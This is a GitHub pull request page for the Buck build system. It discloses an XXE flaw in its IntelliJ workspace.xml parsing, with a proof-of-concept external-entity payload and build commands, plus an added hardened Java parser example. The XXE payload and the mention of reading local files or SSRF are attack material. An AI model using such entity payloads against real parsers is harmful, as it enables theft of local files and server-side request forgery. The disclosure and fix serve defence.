facebook / buck

A fast build system that encourages the creation of small, reusable modules over a variety of platforms and languages.
https://buck.build
Apache License 2.0

fix "XXE vulnerability" #2743

Closed Crispy-fried-chicken closed 9 months ago

Crispy-fried-chicken commented 1 year ago

Security Vulnerability - Action Required: XXE vulnerability in the newest version of buck

Hi there,

I think the method com.facebook.buck.features.project.intellij.WorkspaceUpdater.createDocumentBuilder() may have an XXE vulnerability, which is present in the newest version of buck. It shares similarities with a recent CVE disclosure, CVE-2021-4295, in the "onc-healthit/code-validator-api" project.

Vulnerability Detail:

CVE Identifier: CVE-2021-4295

Description: A vulnerability classified as problematic was found in ONC code-validator-api up to 1.0.30. This vulnerability affects the vocabularyValidationConfigurations of the file src/main/java/org/sitenv/vocabularies/configuration/CodeValidatorApiConfiguration.java of the component XML Handler. The manipulation leads to xml external entity reference. Upgrading to version 1.0.31 is able to address this issue. The name of the patch is fbd8ea121755a2d3d116b13f235bc8b61d8449af. It is recommended to upgrade the affected component. VDB-217018 is the identifier assigned to this vulnerability.

Reference: https://nvd.nist.gov/vuln/detail/CVE-2021-4295

Patch: https://github.com/onc-healthit/code-validator-api/commit/fbd8ea121755a2d3d116b13f235bc8b61d8449af

Vulnerability Description: The vulnerability is present in the class com.facebook.buck.features.project.intellij.WorkspaceUpdater of method createDocumentBuilder(), which is responsible for creating a document builder for parsing and processing XML documents. The vulnerable call chain we discover is:

 updateOrCreateWorkspace()->updateExistingWorkspace(InputStream workspaceFile)->parseWorkspaceFile(InputStream workspaceFile)->createDocumentBuilder().parse(workspaceFile)

Given that the workspace.xml, which stores the settings and state information of the workspace of an IntelliJ IDEA project, is compromised by a hacker (e.g., using <!ENTITY entityname path>), the victim conducts a regular build process which incorporates the execution of the method updateOrCreateWorkspace(). As a consequence, the method createDocumentBuilder() will parse the compromised workspace.xml, resulting in an XML External Entity (XXE) Injection attack.

Proof of Concept: To facilitate demonstration, I created a PoC. The implementation steps of the PoC are as follows:

  1. Prerequisites: To manually build Buck, download and install the following prerequisites:

  2. Clone the buck project and build it: If all pre-preparations have been completed, execute the following commands to clone and build buck:

    git clone https://github.com/facebook/buck.git
    cd buck
    ant
    ./bin/buck build --show-output buck
    buck-out/gen/programs/buck.pex --help

  3. Move the project which has the workspace.xml file that is compromised by a hacker to the buck directory. The content of the workspace.xml will be like:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE project [
     <!ENTITY externalEntity SYSTEM "samples.txt">
    ]>
    <project version="4">
     <component>
       &externalEntity;
     </component>
     <component name="ChangeListManager">
       <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true"/>
     </component>
    </project>

    The code the hacker added is as follows:

    <!DOCTYPE project [
     <!ENTITY externalEntity SYSTEM "samples.txt">
    ]>
    <project>
     <component>
       &externalEntity;
     </component>
    </project>

    In this statement, the <!DOCTYPE> statement is used to specify the definition of the entity, where externalEntity is the name of the entity, and the path after the SYSTEM keyword specifies the location of the external file. Then, in the <component> tag, use &externalEntity; to refer to the entity, which will be replaced with the content of the external file when parsed.

    The file samples.txt is for demonstration; its content is as follows:

    you are in my control!!

    Besides, hackers can also construct external entities to obtain users' local files, perform Server-Side Request Forgery (SSRF) attacks, etc.

  4. Use the following command to generate project configuration files for IntelliJ IDEA:

    buck-out/gen/ce9b6f2e/programs/buck.pex project --ide intellij projectName

    Then the content of samples.txt will show up in .idea/workspace.xml because of the vulnerability I mentioned above. The content of .idea/workspace.xml is as follows:

    <?xml version="1.0" encoding="UTF-8"?><project version="4">
     <component>
       you are in my control!!
     </component>
     <component name="ChangeListManager">
       <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true"/>
     </component>
    </project>
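As an added illustration from the defender's side, not code from this pull request or from Buck itself, the following shows the kind of hardened DocumentBuilder configuration that closes the parse path described above. The class name, the method names and the sample documents are this example's own (the samples are constructed from the workspace.xml shapes quoted in the report); how Buck's actual createDocumentBuilder() is written is not shown on this page.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class HardenedWorkspaceParser {

  // Hardened counterpart of a bare DocumentBuilderFactory.newInstance().newDocumentBuilder().
  // Hypothetical method for this example; it is not Buck's createDocumentBuilder().
  static DocumentBuilder createHardenedDocumentBuilder() throws ParserConfigurationException {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    // Primary defence: refuse any DOCTYPE, so no entity can be declared in the first place.
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // Defence in depth for parser implementations that do not honour the feature above.
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
    factory.setXIncludeAware(false);
    factory.setExpandEntityReferences(false);
    return factory.newDocumentBuilder();
  }

  // Parses a workspace.xml body and returns its root element name, or null if the
  // document was rejected by the hardened parser (the DOCTYPE case above).
  static String parseWorkspace(String xml) throws ParserConfigurationException, IOException {
    DocumentBuilder builder = createHardenedDocumentBuilder();
    try {
      Document doc = builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
      return doc.getDocumentElement().getTagName();
    } catch (SAXException e) {
      // disallow-doctype-decl surfaces as a SAXParseException; nothing is expanded or read.
      System.err.println("rejected workspace.xml: " + e.getMessage());
      return null;
    }
  }

  public static void main(String[] args) throws Exception {
    // Constructed sample: the DOCTYPE/ENTITY shape quoted in the report.
    String hostile = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
        + "<!DOCTYPE project [\n"
        + " <!ENTITY externalEntity SYSTEM \"samples.txt\">\n"
        + "]>\n"
        + "<project version=\"4\"><component>&externalEntity;</component></project>";
    // Constructed sample: an ordinary workspace.xml carrying no DOCTYPE.
    String benign = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
        + "<project version=\"4\">\n"
        + " <component name=\"ChangeListManager\">\n"
        + "  <option name=\"EXCLUDED_CONVERTED_TO_IGNORED\" value=\"true\"/>\n"
        + " </component>\n"
        + "</project>";

    System.out.println("hostile -> " + parseWorkspace(hostile));
    System.out.println("benign  -> " + parseWorkspace(benign));
  }
}
```

Disallowing the DOCTYPE is the simplest complete fix when, as with IntelliJ's workspace.xml, the format never legitimately needs one; the remaining feature settings matter for parsers that ignore the Xerces-specific disallow-doctype-decl feature. A check a reviewer can apply to the fix in this pull request is whether every path into DocumentBuilderFactory in the module goes through one such hardened factory rather than a bare newInstance().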

facebook-github-bot commented 1 year ago

Hi @Crispy-fried-chicken!

Thank you for your pull request and welcome to our community.

Action Required

In order to merge any pull request (code, docs, etc.), we require contributors to sign our Contributor License Agreement, and we don't seem to have one on file for you.

Process

In order for us to review and merge your suggested changes, please sign at https://code.facebook.com/cla. If you are contributing on behalf of someone else (eg your employer), the individual CLA may not be sufficient and your employer may need to sign the corporate CLA.

Once the CLA is signed, our tooling will perform checks and validations. Afterwards, the pull request will be tagged with CLA signed. The tagging process may take up to 1 hour after signing. Please give it that time before contacting us about it.

If you have received this in error or have any questions, please contact us at cla@meta.com. Thanks!